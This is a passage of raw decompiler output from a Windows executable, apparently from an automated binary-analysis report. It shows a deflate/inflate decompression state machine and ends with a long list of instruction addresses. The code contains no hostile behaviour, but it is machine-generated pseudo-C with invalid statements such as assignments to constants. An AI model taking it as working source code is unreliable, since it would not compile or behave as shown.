												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406d85
0x00406d85
0x00406d85
0x00406d85
0x00406d85
0x00406d89
0x00000000
0x00000000
0x00406d8f
0x00406d8f
0x00406d92
0x00406d95
0x00406d9a
0x00406d9c
0x00406d9f
0x00406da2
0x00406da5
0x00406da5
0x00406da8
0x00000000
0x00000000
0x00406daa
0x00406daa
0x00406dad
0x00406db2
0x00406db4
0x00406db7
0x00406dbd
0x00406b1c
0x00406b1c
0x00406b1f
0x00406b25
0x00406b2b
0x00406b34
0x00406b3a
0x00406b3d
0x00406b44
0x00406b49
0x00406b4f
0x00406b5a
0x00406b5a
0x00406dc3
0x00406dc3
0x00406dcd
0x00000000
0x00000000
0x00406dd3
0x00406dd3
0x00406dd7
0x00406dda
0x00406dda
0x00406dde
0x00406de4
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00406df2
0x00406e14
0x00406e14
0x00406e17
0x00000000
0x00000000
0x00406df4
0x00406df8
0x00000000
0x00000000
0x00406dfe
0x00406dfe
0x00406e01
0x00406e04
0x00406e09
0x00406e0b
0x00406e0e
0x00406e11
0x00406e11
0x00406e19
0x00406e19
0x00406e1f
0x00406e22
0x00406e25
0x00406e25
0x00406e2c
0x00406e30
0x00406e34
0x00406e37
0x00406e3a
0x00406e40
0x00406e45
0x00000000
0x00000000
0x00406e47
0x00406e5b
0x00406e5b
0x00406e5f
0x00000000
0x00000000
0x00406e49
0x00406e4c
0x00406e4c
0x00406e53
0x00406e58
0x00406e58
0x00406e58
0x00406e61
0x00406e61
0x00406e64
0x00406e72
0x00406e78
0x00406e7d
0x00406e83
0x00406e89
0x00406e8f
0x00406e96
0x00406eaa
0x00406eaa
0x00407479
0x00407479
0x00407479
0x0040747e
0x00000000
0x00000000
0x00406ab6
0x00406ab6
0x00000000
0x004070b1
0x004070b1
0x004070b5
0x004070b8
0x004070bb
0x004070be
0x00000000
0x00000000
0x004070c4
0x004070c4
0x004070e9
0x004070e9
0x004070e9
0x004070eb
0x00000000
0x00000000
0x004070c9
0x004070c9
0x004070cd
0x00000000
0x00000000
0x004070d3
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070de
0x004070e0
0x004070e3
0x004070e6
0x004070e6
0x004070e6
0x004070ed
0x004070ed
0x004070f5
0x004070f8
0x004070fb
0x004070fe
0x00407102
0x00407105
0x00407107
0x0040710a
0x0040710c
0x00407120
0x00407120
0x00407123
0x0040713d
0x0040713d
0x00407140
0x00000000
0x00000000
0x00407146
0x00407146
0x00407149
0x00000000
0x00000000
0x0040714f
0x0040714f
0x00000000
0x0040714f
0x00407125
0x00407128
0x0040712f
0x00407132
0x00000000
0x00407132
0x0040710e
0x00407112
0x00407115
0x00000000
0x00000000
0x0040715a
0x0040715a
0x0040717f
0x0040717f
0x0040717f
0x00407181
0x00000000
0x00000000
0x0040715f
0x0040715f
0x00407163
0x00000000
0x00000000
0x00407169
0x00407169
0x0040716c
0x0040716f
0x00407172
0x00407174
0x00407176
0x00407179
0x0040717c
0x0040717c
0x0040717c
0x00407183
0x0040718b
0x0040718e
0x00407191
0x00407193
0x00407196
0x00407196
0x00407198
0x0040719c
0x0040719f
0x004071a2
0x004071a5
0x00000000
0x00000000
0x004071ab
0x004071ab
0x004071d0
0x004071d0
0x004071d0
0x004071d2
0x00000000
0x00000000
0x004071b0
0x004071b0
0x004071b4
0x00000000
0x00000000
0x004071ba
0x004071ba
0x004071bd
0x004071c0
0x004071c3
0x004071c5
0x004071c7
0x004071ca
0x004071cd
0x004071cd
0x004071cd
0x004071d4
0x004071d4
0x004071dc
0x004071df
0x004071e2
0x004071e5
0x004071e9
0x004071ec
0x004071ee
0x004071f1
0x004071f4
0x0040720e
0x0040720e
0x00407211
0x00000000
0x00000000
0x00407217
0x00407217
0x0040721a
0x00407221
0x00000000
0x00407221
0x004071f6
0x004071f9
0x00407200
0x00407203
0x00000000
0x00000000
0x00407229
0x00407229
0x0040724e
0x0040724e
0x0040724e
0x00407250
0x00000000
0x00000000
0x0040722e
0x0040722e
0x00407232
0x00000000
0x00000000
0x00407238
0x00407238
0x0040723b
0x0040723e
0x00407241
0x00407243
0x00407245
0x00407248
0x0040724b
0x0040724b
0x0040724b
0x00407252
0x0040725a
0x0040725d
0x00407260
0x00407262
0x00407265
0x00407265
0x00407267
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407270
0x00407275
0x00407277
0x0040727d
0x0040727f
0x00407294
0x00407296
0x00407296
0x00407281
0x00407287
0x00407289
0x0040728b
0x0040728b
0x00407298
0x0040729c
0x0040729f
0x004072a5
0x004072a5
0x004072a8
0x004072a8
0x004072a8
0x004072aa
0x00000000
0x00000000
0x004072b0
0x004072b0
0x004072b6
0x004072b8
0x004072dd
0x004072e0
0x004072e6
0x004072eb
0x004072f1
0x004072f7
0x004072f9
0x004072fc
0x00407305
0x0040730b
0x0040730b
0x004072fe
0x00407300
0x00407302
0x00407302
0x0040730d
0x00407313
0x00407315
0x00407318
0x0040731a
0x00407320
0x00407322
0x00407324
0x00407326
0x00407328
0x0040732b
0x00407334
0x00407337
0x00407337
0x0040732d
0x0040732d
0x00407330
0x00407330
0x0040732b
0x00407322
0x00407339
0x0040733b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733b
0x004072ba
0x004072ba
0x004072c0
0x004072c6
0x004072c8
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072cc
0x004072ce
0x004072d7
0x004072d7
0x004072d0
0x004072d0
0x004072d3
0x004072d3
0x004072d9
0x004072db
0x00000000
0x00000000
0x00407341
0x00407341
0x00407346
0x00407348
0x00407349
0x0040734a
0x0040734b
0x00407351
0x00407354
0x00407357
0x0040735a
0x0040735c
0x00407362
0x00407362
0x00407365
0x00407365
0x00407365
0x00407365
0x0040736e
0x00000000
0x00000000
0x00407373
0x00407373
0x00407376
0x00407379
0x0040737b
0x00407412
0x00407412
0x00407415
0x00407417
0x00407418
0x00407419
0x0040741c
0x00000000
0x0040741c
0x00407381
0x00407381
0x00407387
0x00407389
0x004073ae
0x004073b1
0x004073b7
0x004073bc
0x004073c2
0x004073c8
0x004073ca
0x004073cd
0x004073d6
0x004073dc
0x004073dc
0x004073cf
0x004073d1
0x004073d3
0x004073d3
0x004073de
0x004073e4
0x004073e6
0x004073e9
0x004073eb
0x004073f1
0x004073f3
0x004073f5
0x004073f7
0x004073f9
0x004073fc
0x00407405
0x00407408
0x00407408
0x004073fe
0x004073fe
0x00407401
0x00407401
0x004073fc
0x004073f3
0x0040740a
0x0040740c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040740c
0x0040738b
0x0040738b
0x00407391
0x00407397
0x00407399
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739d
0x0040739f
0x004073a6
0x004073a6
0x004073a8
0x004073a1
0x004073a1
0x004073a3
0x004073a3
0x004073aa
0x004073ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407424
0x00407424
0x00407427
0x00407429
0x0040742c
0x0040742f
0x0040742f
0x0040742f
0x0040742f
0x00000000
0x00000000
0x00000000
0x00406add
0x00406ac1
0x00000000
0x00406ac7
0x00406aca
0x00406ad4
0x00406ad7
0x00406ada
0x00000000
0x00406ada
0x00406ac1
0x00406ae5
0x00406ae8
0x00406aec
0x00406af6
0x00406b00
0x00406b03
0x00406b09
0x00406c3d
0x00406c3f
0x00406c45
0x00406c48
0x00406c4b
0x00000000
0x00406c4b
0x00406b0f
0x00406b0f
0x00406b10
0x00406b68
0x00406b68
0x00406b6f
0x00406c15
0x00406c15
0x00406c1a
0x00406c1d
0x00406c22
0x00406c25
0x00406c2a
0x00406c2d
0x00406c32
0x00406c35
0x00406c35
0x00000000
0x00406b75
0x00406b75
